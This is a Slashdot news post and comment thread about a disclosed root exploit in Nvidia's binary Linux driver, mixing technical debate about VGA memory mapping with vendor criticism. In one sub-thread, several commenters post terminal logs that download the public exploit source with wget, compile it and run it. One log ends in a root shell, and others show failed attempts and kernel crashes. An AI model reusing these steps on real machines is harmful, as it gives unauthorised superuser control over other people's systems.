Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole

An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public." The one releasing the exploit (relayed to him anonymously) is David Arlie, well known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.

Use Windows | +5 Insightful

[h910]

Use Windows and you don't get linux malware. True story, mod +5 true accordingly.

Re:Use Windows | +5 Insightful

[broginator]

That's like saying "Drive Fords, that way you won't crash in a Chevy."

Re:Use Windows | +5 Insightful

[Tapewolf]

Use Windows and you don't get linux malware. True story, mod +5 true accordingly.

Since Nvidia's drivers share a large amount of common code, I'd say it's only a matter of time.

Re:Use Windows | +5 Insightful

[pulski]

Don't feed the trolls.

h### account name promoting Microsoft. I'm shocked!

Re:Use Windows | +5 Insightful

Wow. Microsoft's shills are actually using the subject header to try to mislead Slashdot readers into thinking the post was rated anything above the -2 it deserves*? Good gravy, everyone, this is it. THIS is what Microsoft's desperation looks like when they discover they can't buy or bully their way through the tech world any more.

*: Yes, I know they fixed that bug a long time ago.

Re:Use Windows | +5 Insightful

You're pretty paranoid if you think that's a Microsoft shill.

The header trick is WAY too smart for them.

Re:Use Windows | +5 Insightful

I noticed that first post on such stories usually belongs to an MS shill.

Re:Use Windows | +5 Insightful

Use windows and you will get windows malware

Re:Use Windows | +5 Insightful

[hlavac]

Yes, Microsoft is full steam ahead on astroturfing and sockpuppeting. It's their new marketing strategy, as bribing "influencers" didn't work out so well. Next in line is probably extortion when everyone refuses to accept the Windows 8 lockdown. What will it take to stop this pit of evil madness M$ has become lately? Never thought I will say this but here goes: Bill Gates, you were such a nice, reasonable guy! We miss you!

A view to a kill.

Shouldn't the VGA window be a window into the video memory, or at least configuration registers?

Re:A view to a kill.

[greg1104]

VGA maps the video card's memory into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).

Re:A view to a kill.

[causality]

Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).

... that nobody uses anymore, at least not with PC hardware.

Re:A view to a kill.

Is this due to a very old code base in the windows driver, and the driver code being shared between both linux and windows? Compatibility makes sense if you are running DOS or allowing DOS apps to function (or maybe 16-bit windows). But I very much doubt Monochrome, CGA, EGA, and some of the old VGA standard works at all in modern windows, and definitely not in linux.

This should never have been exposed to the user in linux and hopefully not in windows either. And if compatibility is a concern, then it should be through emulation and a protected path if hardware access is useful.

Re:A view to a kill.

[Desler]

Windows 7 still includes a VGA video driver.

Re:A view to a kill.

[The+MAZZTer]

Guess what, your computers boots right into 16-color text mode (used by the BIOS and sometimes by Windows as part of the boot sequence) using EGA colors. Not sure if that's relevant but it might be. Linux might also use something similar for its boot process and for Ctrl+Alt+Fn terminals.

Re:A view to a kill.

[rjr162]

That it does. Reimaged a dell e6240 laptop using IBM's tavoli system manager the other week, and it apparently failed at some point. Everything installed and worked except the one video driver.
These laptops can use the built in intel video for battery savings and switch over to a build in nvidia "card" when more grunt is needed. The issue was the laptop wouldn't output video to an external monitor. I checked in device manager and the nvidia card was listed as it should be, but the intel video was listed as "generic VGA" which still allowed video to display on the laptop screen but didn't have the ability to work with an external monitor.

Re:A view to a kill.

[MightyMartian]

So how does Windows deal with restricting where this window can be remapped?

Re:A view to a kill.

[hobarrera]

But do we really need this backwards compatibility? Look at the supported video cards; does anyone that uses those cards need compatibility with that? The driver also required a relatively recent kernel; so again, is this compatibility required?

I'm not trying to be ironic, I'm legitimately in doubt here.

Re:A view to a kill.

[hobarrera]

Users wanting monochrome/CGA/EGA could just use nouveau, the only reason to use the nvidia binary blob is to support 2D/3D acceleration.

Re:A view to a kill.

[greg1104]

VGA works fine in Windows and in Linux. See Linux framebuffer as a relatively modern implementation. (I say relatively modern because I'd been using Linux for a long time before it was added, and it's new compared to things like X-Windows) PC hardware is certainly not so abstracted away by useful APIs that the drivers can ignore this level of detail, to be protected from them. Manipulating this sort of thing is exactly what a driver is written to do.

Your suggestion that this shouldn't have been exposed to the user is missing the point: this is an exploit. The driver itself needs to know all these details to properly initialize itself and support old-school text/VGA modes during boot. The user was likely never intended to have access to them, but an exploit isn't limited to what the user is supposed to do. Whether or not the path is protected or not is irrelevant if the path is bypassed.

Re:A view to a kill.

[shentino]

Older video standards have been banned ever since KMS depended on FBCON in the kernel.

Re:A view to a kill.

[h4rr4r]

Does the Nvidia driver even support KMS?

Re:A view to a kill.

[Carewolf]

That used to be true, but I don't think I have owned a computer that didn't boot in VGA in almost 6 years. My latest laptop boots directly into some kind of SVGA and runs the bios in that. I had a screen that couldn't show lowres SVGA for some reason, and it became a bit of problem since the screen was blank until X loaded. I had to change grub to switch to text-mode, atleast that worked, but old text modes are not used by default anymore, not even by Debian.

Re:A view to a kill.

[causality]

Guess what, your computers boots right into 16-color text mode (used by the BIOS and sometimes by Windows as part of the boot sequence) using EGA colors. Not sure if that's relevant but it might be. Linux might also use something similar for its boot process and for Ctrl+Alt+Fn terminals.

Yes. When it does that, the OS has not yet loaded. Hell, the boot loader (GRUB in my case) has not yet loaded.

It's obviously implemented in hardware. That means it has nothing to do with the nVidia driver that my OS loads up and whether that nVidia driver supports EGA.

So okay, I'll rephrase my previous comment from "nobody uses it" to "no one needs the nVidia driver to provide it".

Re:A view to a kill.

[sjames]

There is no need whatsoever to remove that. There IS a need for the driver to not allow mmaping any other arbitrary memory range into a userspace app andto properly control access to the video memory.

Re:A view to a kill.

When I said VGA, I said old-VGA. Like the first VGA cards, before VESA. Fixed-frequency. Or other proprietary junk. This stuff is not likely going to work, at least in the framebuffer implementation, without some hacking. Most everything today has some form of VESA, so in that case, yes VGA works there. But that doesn't ignore the fact there probably is backwards compatibility for stuff that was used with DOS and PCs.

Re:A view to a kill.

[hairyfeet]

Not to mention Nvidia hasn't been the greatest when it comes to support for old games so i doubt one could even use that as an excuse. More likely this is just some legacy crap that nobody wanted to throw out in case somebody somewhere was actually using it. Large companies with huge legacies tend to be VERY conservative about such things because you never know when some company somewhere is running some legacy program that requires this. I wonder if AMD has those older modes baked into its driver as well?

That said EGA and CGA haven't been mainstream in...what? Nearly 30 years? Yeah I think we can say goodbye to those by now.

Re:A view to a kill.

[hairyfeet]

My guess? Protected Path as you would be able to bypass the DRM of services like netflix if you could use a buffer exploit like this to gain control of the card.

Ironically this might be one of the only times when DRM could be a benefit to the end user.

Re:A view to a kill.

[greg1104]

VESA is a standard for settings modes and the like. Under that hood there is still the same old memory mapped I/O as always.

Re:A view to a kill.

[greg1104]

Every SVGA implementation I'm aware of still maps the display buffer into main memory and then has low-level software twiddle the bits manually. Any laptop that doesn't do that I would say isn't even a "PC Compatible" anymore. If it has a BIOS, it almost certainly has memory-mapped I/O into the "VGA window" alluded to here. There might be some UEFI systems that have broken this part. But a company like NVIDIA surely has to still deal with at least bootstrapping BIOS-based system in their driver.

Re:A view to a kill.

[greg1104]

If you want to be able to switch from the video mode the system boots in, which is certainly some sort of memory-mapped VGA-era thing, into the fancier modes, the driver needs to worry about this. The fact that it doesn't likely do very much at all with the VGA memory before moving into something else is probably why the code is buggy; presumably it's not like they ever review this part of it anymore.

Re:A view to a kill.

[spitzak]

It sounds like either the Nvidia driver there does not have this bug, or it does have the bug but nobody has discovered it yet.

Re:A view to a kill.

Yes mmio is still there. My point is not debating whether VGA as a standard works in linux. My point is VGA/EGA/CGA used mmio that protected/non-protected programs used because how things worked in the past in DOS. Programs these days do not write directly to the mmio. Even using the framebuffer, the program is not necessarily writing the mmio directly like you would in DOS. The framebuffer in linux would have been designed with correct access rights being an OS designed with access protection in mind. The Nvidia driver apparently has a legacy code base that does not enforce correct access rights. Not only that, you can move the pointer and have the Nvidia driver write to arbitrary memory locations. They would not have written code for linux today this way on purpose--so why in the world are we exposing mmio to the user when no program (they don't even do a framebuffer for directfb!) would write to mmio directly in linux? That is what I mean they have compatibility for something no one uses in linux, and likely not in windows either.

Hoooo boy...

[Tarlus]

With all the recent controversy and Linus and other members of the FOSS community flipping Nvidia the bird over the issue of keeping their driver closed, they're certainly going to take this news and run with it.

Re:Hoooo boy...

[DaveV1.0]

And, Nvidia will not care what the FOSS community does. 90+% of Nvidia's customers don't use FOSS at all. So many people forget that FLOSS is, at best, a niche market and as such has little influence on business decisions.

Re:Hoooo boy...

Correct. That's why i choose AMD.

Not that they're that much better, but at least they tried to.

Re:Hoooo boy...

I think Nvidia cares. But not as much for gamers as for GPGPU number crunchers.

Re:Hoooo boy...

Nvidia's future is going to be determined almost entirely on success or failure of the Tegra line, which will predominantly run Android. That's why Linus flipped them the bird. Nvidia, as a company, is becoming increasingly dependent upon Linux to succeed financially. Yet they are not making any effort to engage developers or the community at large.

Re:Hoooo boy...

[serviscope_minor]

FLOSS is, at best, a niche market and as such has little influence on business decisions.

One wonders how FLOSS had little influence on the business decision to, well, support FLOSS as part of their business.

Mysteries, mysteries.

Also, Nvidia want go sell GPUs for HPC. Not supporting Linux is simply not an option in that market.

Re:Hoooo boy...

I think Nvidia cares. But not as much for gamers as for GPGPU number crunchers.

The GK104 GPU they released this year proved otherwise.

Re:Hoooo boy...

[rtfa-troll]

. 90+% of Nvidia's customers don't use FOSS at all.

That may be true, for all I know or care but it's not for want of trying. As their traditional desktop market is dissapearing into irrelevance, with Apple having already decided to skip Nvidia they are desperate to get into the Android market and without that they are in deep trouble.

There is a real reason why their PR people were out in force in response to Linuses recent commends and if I were investing, the fact that they failed to get traction with the community would mean I would be moving my money out of Nvidia.

Re:Hoooo boy...

Also, Nvidia want go sell GPUs for HPC. Not supporting Linux is simply not an option in that market.

Sure. But NVIDIA also has no competition in the HPC market so their Linux support doesn't have to be perfect; it just needs to work better than the competition. And while exploits are serious bugs, it may take more than a month to safely patch a bug after diagnosing the cause, but this bug will get patched.

Re:Hoooo boy...

[ifiwereasculptor]

Correct. That's why i choose AMD.

Not that they're that much better, but at least they tried to.

Actually they're still trying, and improvements are being made. Slowly, but steadily. The Radeon driver is miles ahead of Nouveau, now. It's on its way to performance parity on older hardware (circa 2004). Nouveau, on the other hand, simply doesn't work with a card from those era (NV30-NV44 do not work with anything GTK3 - Gnome Shell, Unity and Cinnamon are all unusable). Neither does the legacy driver, by the way - it doesn't draw garbage like Nouveau, but it runs at about 0.2 fps and crashes in under a minute. As they already said they won't update the legacy driver on Nvnews, I'd say AMD's OS driver initiative is starting to pay off.

Re:Hoooo boy...

Unfortunately for NVIDIA, the driver they run on Linux is the very same that runs on Windows, THE VERY SAME. They call it Unified Driver Architecture, it's a blob of code that is the same on every platform, Linux, FreeBSD, Solaris, Windows and OSX, only the shim is different. So this bug is also exploitable on OSX and Windows, even if a public proof-of-concept is not yet available.

Open Source Advantage

[Nerdfest]

I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.

Re:Open Source Advantage

Can't do half of what i like to do with my computer using nouveau, it sucks.

Re:Open Source Advantage

[Dagger2]

Clearly the proprietary driver is much better then, since it allows me to do whatever I like with your computer.

Re:Open Source Advantage

[jedidiah]

You have to get to it first. Good luck with that.

Re:Open Source Advantage

[ilikenwf]

It's hard to run GL based apps in Wine or use VMWare machines with nouvau...I've tried...that's all it lacks for me to use it all the time.

Re:Open Source Advantage

yeah, it sucks... Can't do half of what i like to do with your computer using nouveau.

Re:Open Source Advantage

I use VMware machines with radeon driver on an AMD card. Works perfectly.

Re:Open Source Advantage

[hobarrera]

It could have happened, and most probably would have happened at some point, but might have been spotted sooner, and would have been fixed long ago now.
Plus, I'm sure there's plenty of other bugs/exploits we still haven't even discovered.

Re:Open Source Advantage

[Zontar+The+Mindless]

I use VMWare almost every single day on a Linux host that employs the Nouveau drivers, and it works fine. KDE 4 desktop on the host, a bit of eye candy.

If you're trying to use the Nouveau (or even the proprietary) drivers *inside* a VMware guest, that's just silly, and I really hope that's not what you meant.

Re:Open Source Advantage

While it's fair to point out that nouveau does lack many features of the blob, it is also fair to say that nouveau is awesome, getting better all the time and already has a huge advantage over the official driver being Free software.

Re:Open Source Advantage

[Zontar+The+Mindless]

Crap. s/VMware/VirtualBox/

(I do NOT use VMware. There being little point in doing so when VBox is free as in beer AND in speech and just plain works better.)

Re:Open Source Advantage

[makomk]

It wouldn't have happened with an open source driver because Linus wouldn't have allowed such a foolish feature into the kernel. The open source drivers have quite complicated - and unfortunately somewhat performance-sapping - in-kernel checks on any interaction with the GPUs in order to stop attackers from doing exactly this kind of thing.

Re:Open Source Advantage

[jedidiah]

Talk is cheap. You still haven't said how you are going to get to my box to use this.

THAT is the subtle difference between a bug and something that manages to cripple the entire Internet.

Bad? Sure. Dire? Not so much.

Re:Open Source Advantage

[FormOfActionBanana]

Eric S. Raymond's "Many Eyes" theory has really not stood the test of time. Some research has indicated the security defect rate between open and closed commercial software is about the same (i.e. it relates to your languages and your developers' security skill levels, not to the number of POTENTIAL code reviewers). Open source code and vulnerabilities sit in plain view for years without public discovery.

What has been shown is that sometimes, commercial operations have a framework standing by to deal with security problems when they arise. In this case, it doesn't appear NVidia's security response team was doing anything but who knows. The fact of the matter is non commercial open source projects have such a security incident response team much less often. The Apache project is a good exception.

Disclaimer: I do this for my day job!

Re:Who did he send it to at Nvidia?

Maybe people need to stop being apologists for this kind of thing...

Companies don't just hand out the email address for the head of their SW development division; maybe if they did we could them let the right people know. I emailed a random Joe when I found an issue with a site, and it got escalated up and it got fixed.

Maybe if Nvidia had better quality random Joe's, when this sort of stuff did pass by them it would get escalated and not deleted.

Nvidia rotten to the core

[Jerry+Atrick]

Nvidia are just serial fuckups. Wasted half my saturday trying to find a driver release that would work on my wifes Kubuntu 11 PC. Eventually gave in and upgraded to 12.04 instead of manually erasing the broken install yet again... to find another fscking broken driver and no X. These idiots are completely incompetent and simply don't respond to error reports or much of anything else from ordinary users.

Nvidia, still haven't forgotten all the accelerated functions in your chipsets that gradually got turned of as drivers updated, because the hardware was rotten to the core and couldn't be made to work. Or the ongoing multi year saga of begging for working PAL TV support, all of it falling on deaf ears. Or the magically vanished TV out support when Vista shipped.

Frankly a root exploit is one of their lesser sins.

Re:Nvidia rotten to the core

[ilikenwf]

If you ran a distro that didn't suck, you wouldn't be having issues... Archlinux, gentoo, slackware...I mean, Arch would work best for you here - you just "yaourt -S nvidia-beta-all" and done.

Re:Nvidia rotten to the core

[interval1066]

Frankly a root exploit is one of their lesser sins.

Then their cardinal sins must be Hitlerian; (from David Arlie's write-up)

It basically abuses the fact that the /dev/nvidia0 device accept changes to the VGA window and moves the window around until it can read/write to somewhere useful in physical RAM, then it just does an priv escalation by writing directly to kernel memory.

It doesn't take a lot of thought to understand the implications of the hole. And smacks of pure lazyness on the part of nVidia.

Re:Nvidia rotten to the core

Seriously? This is the kind of shit that makes people hate us Linux users. "Oh, you had a problem? Should have used $MY_FAVORITE_DISTRO then it would have worked! (Unless it still didn't, but let's just ignore that possibility so I can be a smug bastard.)"

Re:Nvidia rotten to the core

shoudlnt run linux nube go to windows.

Re:Nvidia rotten to the core

[Fwipp]

I recommend booting from a LiveCD before installing so you can see if the drivers work.

Re:Nvidia rotten to the core

[Jerry+Atrick]

Frankly a root exploit is one of their lesser sins.

Then their cardinal sins must be Hitlerian; (from David Arlie's write-up)

You forget the episodes like their broken hardware accelerated NIC, that dropped random bits.

First the spent months claiming there was no bug.
Then they spent months claiming they'd fixed it (they hadn't).
Then they claimed they'd fixed it when they'd actually just disabled the acceleration and fallen back to software!

Over a year of data loss for anyone that believed them.

Same thing happened with their attempt at accelerated sound hardware. And pretty much everything else they've tried accelerating apart from GPUs. GPUs have a whole different class of problems to do with not listening to feedback.

Re:Nvidia rotten to the core

[fuzzyfuzzyfungus]

Somebody should probably tell Nvidia that a driver that enables arbitrary memory read/write could probably be used as a DRM circumvention mechanism if targeted at a 'protected' program rather than the kernel. That might actually get them to fix it...

Re:Nvidia rotten to the core

[hobarrera]

In your particular case, the issue is Ubuntu, that does not ship the driver properly, or have any simple way of installing it, and not Nvidia. You'd better use a distro that actually supports it, or use hardware(and driver) your distro completely supports.

Re:Nvidia rotten to the core

[hobarrera]

His advice makes sense.
You bought hardware from a company unwilling to document it's hardware and unwilling to release it's drivers, installed a distro that opts for FLOSS drivers, and then compained the combination didn't work. Of course it didn't, you can't just have ANY software run with ANY hardware perfectly as you expect it to.

Re:Nvidia rotten to the core

[gl4ss]

haha, that's a fucking classic.

makes me laugh almost as hard as believing that I'd get video decoding support in gpu when I bought a gf 6800 back in the day(you know, because it said so on the box). "In late 2005, an update to Nvidia's website finally confirmed what had long been suspected by the user community: WMV-acceleration is not available on the AGP 6800. Of course, today's standard computers are fast enough to play WMV9 video and other sophisticated codecs like MPEG-4, H.264 or Theora without hardware acceleration." (I'm just kidding, I didn't believe them to have actually working acceleration for video decode when I bought them, I did however think that they'd get it sorted out in the drivers for some random video player program to use.. never happened).

Re:Nvidia rotten to the core

He's not running some osbcure distro called Gnu/Wierdo Linux, it's friggin Kubuntu, which is Ubuntu with KDE. An Nvidia card ought to work if it will work at all on linux. And if it wouldn't, then Nvidia shouldn't claim to support Linux.

  And you're ignoring the fact that Nvidia's support still sucks.

Re:Nvidia rotten to the core

And you're ignoring the fact that Ubuntu is the Mac OS 9 of Linux.

Re:Nvidia rotten to the core

Are you sure this isn't Kubuntu's fault? Because I've been running many versions of Slackware over the years, with many nvidia cards and many versions of their drivers, and I never had a combination that didn't just instantly work perfectly.

Re:Nvidia rotten to the core

Go home troll. You're in the wrong neighborhood.
(Captcha: Impress... This shit just keeps happening xD)

Re:Nvidia rotten to the core

Will you be quiet!?! Geez.

Re:Nvidia rotten to the core

Oh, please!

I've re-written the installers for NVidia's binary blobs and library mangling several times, and sent the fixes to NVidia. The problem is that the installer moves aside the existing OpenGL libraries and crates symlinks to their *own* proprietary libraries, and doesn't inform the local package management system of the change. So updates break it, and the installer gets very confused if you try to run it with a new installer and haven't cleared the old installer.

Cleaning up after the resulting mess is awkward, unless someone has thoughtfully bundled it for you into some more sane package. And that's a lot of work to fix something that NVidia keeps breaking in new and creative ways with very, very bad shell scripting.

Re:Nvidia rotten to the core

[Carewolf]

I think they might have a culture of not listening. The chief maintainer of nvidia's official forums, posted after Linus outburst a series of post about how Linus complaints had cause "him and his family severe grief", and that Linus should shut up, and would not be welcome on the forum, and that anybody talking about his comments would be banned.

Jesus christ, that guy needs serious help, but it might be an institutional problem. Maybe they are taught that any complaints about Nvidia are actually mortal stains on their honour as employees of Nvidia??

Re:Nvidia rotten to the core

[hobarrera]

Ubuntu goals are to support and promote free software, NOT to provide support for every fancy 3D feature; there's no reason for them to support nvidia's driver if there's a free alternative.
If you want to use that driver, you'd be better of finding an OS that matches your philosophy.

Re:Nvidia rotten to the core

Nvidia are just serial fuckups. Wasted half my saturday trying to find a driver release that would work on my wifes Kubuntu 11 PC. Eventually gave in and upgraded to 12.04 instead of manually erasing the broken install yet again... to find another fscking broken driver and no X. These idiots are completely incompetent and simply don't respond to error reports or much of anything else from ordinary users.

So, I have to ask, and I mean this earnestly: what chipset vendor do you recommend? I find ATI completely fucked up and unacceptable with respect to driver quality (and no, they haven't improved, and Intel just doesn't have the performance.

Re:Nvidia rotten to the core

[chmod+a+x+mojo]

Who the FUCK modded you Insightful?

Sonovabitch why to the retards ALWAYS come out the one day I don't have mod points?

Re:Nvidia rotten to the core

[Rich0]

A new ultra-critical patch to the Nvidia drivers has been installed (no, we didn't ask you about it first).

We fixed a serious security problem, and now the system will ensure that access to memory in multimedia and copy-protected applications cannot be circumvented. Such access is limited to less critical data such as credit card and banking data, the password database, and kernel memory in general (for areas that do not handle media pathways).

Re:Nvidia rotten to the core

[fuzzyfuzzyfungus]

Unlikely in their Linux driver and I'm not sure how the 'Protected Media Path' is doing in Win7; but in Vista's PMP implementation a driver bug of this flavor(especially in the GPU, since that needs to enforce OPM restrictions) could theoretically lead to cryptographic revocation of the driver...

"If a trusted component in the PE becomes compromised, after due process it will be revoked. However, Microsoft provides a renewal mechanism to install a newer trusted version of the component when one becomes available."

In Linux, I don't think that this bug gives you an greater control than root would ordinarily have through /dev/mem, it's just a major issue because only root is supposed to have that, and even they are generally advised not to mess with it.

Re:Nvidia rotten to the core

[Rich0]

Yeah, I doubt even MS is going to revoke the Nvidia driver's certificate, unless they have a way to revoke it only for use with PMP but not with stuff like booting up and having better than 640x480 resolution. You're talking about a major disruption to half of the consumer PCs on the planet.

I could just see the I'm a Mac ads after that.

Re:Nvidia rotten to the core

[fuzzyfuzzyfungus]

In practice, I suspect that the 'after due process' part includes "Will this piss off millions of our customers?"; but it is my understanding that revocation can be confined to just preventing the driver from being part of any 'trusted' zone in the PMP(which, in the case of the GPU, would pretty much break playback of material that requires the presence of a PMP entirely, since the GPU driver is both highly privileged and responsible for HDCP output handling; but it wouldn't break non-PMP graphics stuff).

works here

It's certainly legit..

c@v:~$
c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin ...
2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225] ...
c@v:~$ mv 86747-001.bin nvid-root.c
c@v:~$ gcc nvid-root.c -o nvid-root
c@v:~$ ./nvid-root
[*] IDT offset at 0xc1808000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc18086e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
[*] Have root, will travel..
sh-4.2#
sh-4.2#

sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
sh-4.2#

sh-4.2# lsb_release -a
LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
Distributor ID: Ubuntu
Description: Ubuntu 12.04 LTS
Release: 12.04
Codename: precise

sh-4.2# uname -a
Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
sh-4.2#

Re:works here

[dmitrygr]

64-bit 2.6.38.8 kernel with nvidia driver 280.13 doesn't work:

[*] IDT offset at 0xffffffff81b60000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81b60dc0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffffffffffe (-2)
[*] Failed to get root.

Re:works here

me@mine:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin
me@mine:~$ mv 86747-001.bin nvid-root.c
me@mine:~$ gcc nvid-root.c -o nvid-root
me@mine:~$ ./nvid-root
[*] IDT offset at 0xffffffff81e35000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81e35dc0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffffffffffe (-2)
[*] Failed to get root.
me@mine:~$ uname -a
Linux foofoo 3.1.10-1.16-desktop #1 SMP PREEMPT Wed Jun 27 05:21:40 UTC 2012 (d016078) x86_64 x86_64 x86_64 GNU/Linux
me@mine:~$ rpm -qa | grep -i nvidia
nvidia-computeG02-295.49-17.1.x86_64
x11-video-nvidiaG02-295.49-17.1.x86_64
nvidia-gfxG02-kmp-desktop-295.49_k3.1.0_1.2-16.1.x86_64

Re:works here

[Ken_g6]

Doesn't work for me on Linux Mint Debian Edition with Xfce, nVidia driver version x86_64-290.10:

uname -a | sed -e 's/^[^0-9]*//'
3.2.0-2-amd64 #1 SMP Sun Mar 4 22:48:17 UTC 2012 x86_64 GNU/Linux

lsb_release -a
LSB Version: core-2.0-amd64:core-2.0-noarch:core-3.0-amd64:core-3.0-noarch:core-3.1-amd64:core-3.1-noarch:core-3.2-amd64:core-3.2-noarch
Distributor ID: LinuxMint
Description: Linux Mint Xfce Edition
Release: 1
Codename: debian

./nvid-root
[*] IDT offset at 0xffffffff8172a000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff8172adc0)
[*] Enhancing gate entry...
[*] Triggering payload...
Killed

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500504] Oops: 0000 [#1] SMP

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500641] Stack:

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500658] Call Trace:

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500675] Code: Bad RIP value.

Message from syslogd@qcomp at Aug 1 12:30:52 ...
  kernel:[148805.500684] CR2: ffffffff81a00000

Re:works here

Does it open any sort of "hole" that "bad guys" could use remotely, or they need to have physical control of the computer to use this exploit?

Re:works here

// This should probably work for 64-bits and 32-bits kernels // But only tested on 64-bits kernels
inline static long init_kallsyms(struct kallsyms *ks) ...
Funny thing from the code, they say they tested it on 64 bit kernels but it *should* work on 32 bit, but from the above posts, it didnt work on two
64 bit kernels but did work on the 32 bit.

Re:works here

[TuxThePenguin2205]

Kinda works for me. Get root on Gentoo box Then everything stopped working within a couple of seconds. any programs started were auto killed and all networking stopped dead. I saw an kernel oops in the kernel ring log. a reboot was required to do anything useful. Linux mysystem 3.2.12-gentoo #1 SMP PREEMPT Mon Mar 26 12:55:47 BST 2012 x86_64 Intel(R) Core(TM) i7 CPU 970 @ 3.20GHz GenuineIntel GNU/Linux NVRM version: NVIDIA UNIX x86_64 Kernel Module 295.59 Wed Jun 6 21:19:40 PDT 2012

Re:works here

generically speaking this is local only, they would have to have a shell account to use the code as is. of course, the guts of it could be included in any software you might download and software could be running as your user id, escalate itself to root privs, and then open itself to outside world. This is why trust is important with regards to repositories and the like.

Consider how many places on the net say to do task xyz, add this line to your apt-sources and then install via apt-get install. How well do you trust those repositories that are not hugely community reviewed? // captcha is mischief, hah

Re:works here

[MikeBabcock]

One wonders if its possible to block this with SELinux.

Re:works here

[digitalaudiorock]

Didn't work on either 32 bit gentoo machines of mine. One with an old card that requires nvidia-drivers-96.43.20: ./nvid-root
[*] IDT offset at 0xc13fe000
[*] Abusing nVidia...
(just ended there)...and one with nvidia-drivers-295.49: ./nvid-root
[*] IDT offset at 0xc13d4000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc13d46e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffb (-5)
[*] Failed to get root.

Re:works here

[fnj]

Why not; SELinux certainly has no problem blocking anything useful from working.

Re:works here

[Tapewolf]

Worked on mine with a custom 3.4 kernel (on AMD64) and with Nvidia 304.22. I'm going to upgrade to 3.5 and see if that makes any difference. Unsurprisingly, but annoyingly, it's knackered VGA mode so I can't switch back to the VTs.

Re:works here

Looks like it partially works if it can cause kernel oops. Correct me if I'm wrong but normal applications shouldn't be able to do that.
Your architecture and/or kernel version is not properly supported in exploit, that's all.

I'm getting the same result on my gentoo (kernel 3.5.0, nvidia 302.17).

Re:works here

[sjames]

Only if you use it to deny all access to the device. But you can do that with rmmod too.

Re:works here

It is possible to block it with a hardened kernel. SELinux will not block this, but Pax and GRSecurity both do...

GRSecurity can be setup to panic the system when an attempt like this is made, and pax doesn't allow it to happen at all.

The best of course is if you build it with stack smashing protection on, which will also cause it to throw and log.

SELinux is garbage for root exploits, its only useful for preventing damage from other exploits.

Re:works here

Doesn't work here with OpenSUSE 12.1 (64-bit kernel 3.1.10, with 295.49 nvidia driver).
I guess it only works with recent drivers.

Re:Who did he send it to at Nvidia?

I read that as "So noone at Nvidia could be bothered to spend 15 minutes and check out the evidence to a reported exploit."

Re:Who did he send it to at Nvidia?

[nedlohs]

Yeah you don't get more flimsy evidence than a working exploit.

Again?

This isn't the first time that the Nvidia driver has had serious security vulnerabilities. It also happened in 2006:

http://phoronix.com/scan.php?page=news_item&px=Mjk5Nw

Re:Again?

You mean six years ago they also had a vulnerability? In the modern world we live, that sounds like a ringing fucking endorsement. With companies like Microsoft, you need only say something like, "last Tuesday." Doesn't sound like a bad track record to me.

Re:Again?

[TheRaven64]

They have security vulnerabilities fairly regularly. Ones that are remotely exploitable are rarer, but the cited one from the grandparent was first known in 2004, not fixed until 2006, and allowed someone to anyone who could make you display an image (e.g. in a web page) run arbitrary code in your kernel. It gets cited a lot because it's a perfect case study in stunningly incompetent security.

Re:Again?

the cited one from the grandparent was first known in 2004, not fixed until 2006

Not true. The advisory writer confused an X server bug (also exploitable!) from 2004 with the nVidia one from 2006. http://nvidia.custhelp.com/app/answers/detail/a_id/1971/~/linux---how-does-the-rapid7-advisory-r7-0025-affect-the-nvidia-unix-driver

and allowed someone to anyone who could make you display an image (e.g. in a web page) run arbitrary code in your kernel. It gets cited a lot because it's a perfect case study in stunningly incompetent security.

Also not true. It required carefully-crafted fonts and let you run code in the X server (which usually runs as root, but doesnt have to).

Re:Who did he send it to at Nvidia?

[ZeroSumHappiness]

If you're not surprised then I hope it's because you expect Nvidia to be shite. Microsoft, as policy (though possibly not practice), fully evaluates any possible security exploits submitted because they assume that among the cranks who've already broken through the airlock there might be a real security exploit. This is expensive but necessary. If Nvidia can't do the same then I'll have to seriously consider my choices next time I'm buying a card.

I'll take my chances

People don't buy HD cards to get tearing, pixelated images and laggy playback using shitty opensource drivers.

